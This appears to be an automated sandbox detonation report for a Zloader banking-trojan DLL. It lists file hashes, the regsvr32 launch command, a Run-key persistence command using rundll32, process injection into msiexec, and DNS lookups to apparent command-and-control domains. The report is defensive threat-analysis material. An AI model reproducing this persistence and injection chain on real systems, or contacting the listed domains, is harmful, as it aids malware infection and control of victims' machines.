SHA512 0589c03a66620a762dcf5c16cf337b9a97507735981c32eaff900a25bdfedff4778cf686df882711bd9f3473d65450af3c6993c10fa31242a10c1244e2469f2c

C:\Users\Admin\AppData\Local\Temp\8jiuu6qn.0.vb

MD5 af52f4c74c8b6e9be1a6ccd73d633366
SHA1 186f43720a10ffd61e5f174399fb604813cfc0a1
SHA256 2d85e489480ba62f161d16a8f46fb85083ab53f2d9efe702ce2e49e0d68eca07
SHA512 c521dacb09ddfe56e326cf75f9f40adc269a9b48ea3217e55c6381e836d226066ecf9721650ce74aebb763cd1d22f3d1f06b4567ee7683ba83f5f00ef41ae99e

C:\Users\Admin\AppData\Local\Temp\8jiuu6qn.cmdline

MD5 62b713417070f91f5b1af3ad022d7b39
SHA1 acd4d4a16b1fa495103872a99782950b46d5f8b7
SHA256 1c9ffaec8a95793e353a6d7deab8c6d3048c365b40fd1fc5ce9a0b890776063b
SHA512 69181ce1d49abb9c2e0ea8c2973aada49934b9501229827df03a3e0332b5922cfa83d57e7d882cb333a18b7ab19f0a2e31526149dba90770ec564044fbc0a3bf

C:\Users\Admin\AppData\Local\Temp\vbcD737156C5AA547DFB570F4FB91D95D7E.TMP

MD5 8135713eeb0cf1521c80ad8f3e7aad22
SHA1 1628969dc6256816b2ab9b1c0163fcff0971c154
SHA256 e14dd88df69dc98be5bedcbc8c43d1e7260b4492899fec24d964000a3b096c7a
SHA512 a0b7210095767b437a668a6b0bcedf42268e80b9184b9910ed67d665fba9f714d06c06bff7b3da63846791d606807d13311946505776a1b891b39058cfb41bd4

C:\Users\Admin\AppData\Local\Temp\RESF0E3.tmp

MD5 522f9d1e07a2a1e6767276dbcbe5ec8c
SHA1 a2c36f6089dc7a4d9ad490543063471e5d274d16
SHA256 ed61f843745dad50a2b8706a92bd3409ec576596736bda8d66f18863fafe9bbf
SHA512 882659b5c1c1865b37cfa38305dba0fbb93411378fc7e2e8a58897f966d6b80885152fb6a3d0e196f54c8c2c70f23884992c99b2612cf03eb1981fdcfbe83d63

C:\Users\Admin\AppData\Local\Temp\sinlewel.cmdline

MD5 1f448be937f583be715a6c47e969382f
SHA1 5a2638c8087f59c0dedf5628857b72fc6cb7a344
SHA256 a90be90da16d610a09a294b709e52e29b5d50b71e67b5f7f68fdd23556388bec
SHA512 c991fc1cbbe10d226ac2940e02905e9aae49480bfb2c8922d180c7bc3d6c432ad7935eb4a43dc1f2d4c4387007f5f37c377ef517fc9f9a242df11cb84b615a48

C:\Users\Admin\AppData\Local\Temp\sinlewel.0.vb

MD5 6d569859e5e2c6ed7c5f91d34ab9f56d
SHA1 7bcd42359b8049010a28b6441d585c955b238910
SHA256 3352cf84b9c7b33c2dd6e2194ff24e6a5bd0da7bb829c6cadcf9b33c65f21e78
SHA512 accd61c856a1f862699566e9f0cea6a30ab0261fa5fd048a00a5a98bf827184ebfdf1c3c879987bb2210626e71c390f2f366bea02f9ec3219cce4c15ef7ea0d7

C:\Users\Admin\AppData\Local\Temp\RESF160.tmp

MD5 dc222ae00c9605cf8e2f6ec9dccd7a90
SHA1 ea9bde7e068023ac7496f8701792ef1df9376925
SHA256 bf06ff4f55c2f24a1dd45dbe02f18e6f8431f0cb0164976d954d94e559ac7d54
SHA512 d9aee9c7c4813c9a4636dd15ccbc88a8fa33d86ebb92acd0946ddc711522f9f47bff3ad92a8c85d53a64cf7b9bf58f2df5f02aebcd1fa6459af66c3259571b45

C:\Users\Admin\AppData\Local\Temp\6xcpfogb.cmdline

MD5 bed06ac4148f4ae5d4a30918363d9b47
SHA1 5c5111d6279af87ca5c4daa648a5b7040b25c5dc
SHA256 43a50fc4d4133b3e1b960d686ce312ac2a08a23ff4569fd101f00e100aeffba1
SHA512 062354a787351989c47cc8818fce7f3a5922920a84b9e3a0bbc91464f599e33292640a97c7bb100dd423a3dcaef86c4d5ce172c7f9638ffde8ddc58d6f85b239

C:\Users\Admin\AppData\Local\Temp\6xcpfogb.0.vb

MD5 62caeb4021ea9d333101382b04d7ac1c
SHA1 ebe2bb042b8a9c6771161156d1abdce9d8d43367
SHA256 e466fcc723dfa8d713c6e7c2208581f1c94ecf06a5dd2e3b83d3a93636badbd7
SHA512 e283647c6e24d912833229ce80055d103359ace1e83c051227d40a672691491ef612ea639ebc896d01ff132c5f101132b5397e5c59a8ddbf11e58fdd2052247c

C:\Users\Admin\AppData\Local\Temp\RESF1DD.tmp

MD5 4d6f633d78a3da13f0113e485227e978
SHA1 9b0f0bd23f4d66f3566a7b6318ff9de682004d4d
SHA256 866cea41a55241d1397ea6bc51a0809ff6d2831cff1570654d3f03d5437defa9
SHA512 7b83164d34df6cef457c8a59f51738f5aaaf676701237dda8beb8696dfb7cc2630b2f0abbe50a57fe2fb96934b959181e82f38ad30b12e5c41ad76c1cddd2973

C:\Users\Admin\AppData\Local\Temp\j5hwri9v.cmdline

MD5 01f98e049edd39792f8d6e76f729f837
SHA1 c0ed1af5bc696c4cf63ecf6ad624f1605198ce0e
SHA256 cd93930bc39664b0e6cd84ad889b4c5db05d9b1be6d39bf0a228f9aa3a7ca9fb
SHA512 4ac11c15071c6674feeb5b07d881056ad4c530ef1286ecf72e12d5cdfdfd154490be2da7890c724a2af5f863d700a4ac381dfaef92ddbfa95a4501e8f079b081

C:\Users\Admin\AppData\Local\Temp\j5hwri9v.0.vb

MD5 9cc0fccb33a41b06335022ada540e8f9
SHA1 e3f1239c08f98d8fbf66237f34b54854ea7b799a
SHA256 b3007d9bef050c2dd5b7c6376ccfc00929cd51f23fcd6cbc254b139ddaf81a49
SHA512 9558ae7a93851c901293c8971d141915ed99bbe98c23855e8d4584936bf3b793904ff452d61e620614cd90c7dc2f385f86fee73cfbe4e6ddf6ee9f71b8e2f6eb

C:\Users\Admin\AppData\Local\Temp\vbcF7D944F392DA4528861D5A75E84BF070.TMP

MD5 7a707b422baa7ca0bc8883cbe68961e7
SHA1 addf3158670a318c3e8e6fdd6d560244b9e8860e
SHA256 453ad1da51152e3512760bbd206304bf48f9c880f63b6a0726009e2d1371c71c
SHA512 81147c1c4c5859249f4e25d754103f3843416e3d0610ac81ee2ef5e5f50622ea37f0c68eeb7fa404f8a1779dc52af02d2142874e39c212c66fa458e0d62926a9

C:\Users\Admin\AppData\Local\Temp\RESF23B.tmp

MD5 cbfdc694961ec4231f2802b8900a2c41
SHA1 35a2d4109ecc605089515c9bfd58fb66df6bbc7b
SHA256 3d855bd084368e88b68d32614641f09b9bc5c6784e25750800f43ed838f457b2
SHA512 ced0c1ec275f364acf5a70abfe431a2c87b83c75347dd86f4edf70e96e2a4bb5f903bcb4320259c33a1d6e6eb164cc040cc8c4da229c62afb05ff983a6a247ee

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

97s

Max time network

116s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3690492401-2005096563-3427069815-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ahydgaa = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\Agbibo\\fyofbabu.dll,DllRegisterServer" C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4876 set thread context of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 set thread context of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2748 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2748 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2748 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2432 wrote to memory of 3584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2432 wrote to memory of 3584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3584 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3584 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3584 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c rundll32.exe C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll,DllRegisterServer

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll,DllRegisterServer

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll,DllRegisterServer

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 airnaa.org udp
US 8.8.8.8:53 airnaa.org udp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 airnaa.org udp
US 8.8.8.8:53 banog.org udp
US 8.8.8.8:53 banog.org udp
US 8.8.8.8:53 banog.org udp
US 8.8.8.8:53 rayonch.org udp
US 8.8.8.8:53 rayonch.org udp

Files

memory/1720-0-0x0000000000BE0000-0x0000000000C05000-memory.dmp

C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll

MD5 9e9bb42a965b89a9dce86c8b36b24799
SHA1 e2d1161ac7fa3420648ba59f7a5315ed0acb04c2
SHA256 08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d
SHA512 e5ba20e364c96260c821bc61eab51906e2075aa0d3755ef25aabfc8f6f9545452930be42d978d96e3a68e2b92120df4940b276c9872ebf36fa50913523c51ce8

memory/4564-4-0x0000000001270000-0x0000000001295000-memory.dmp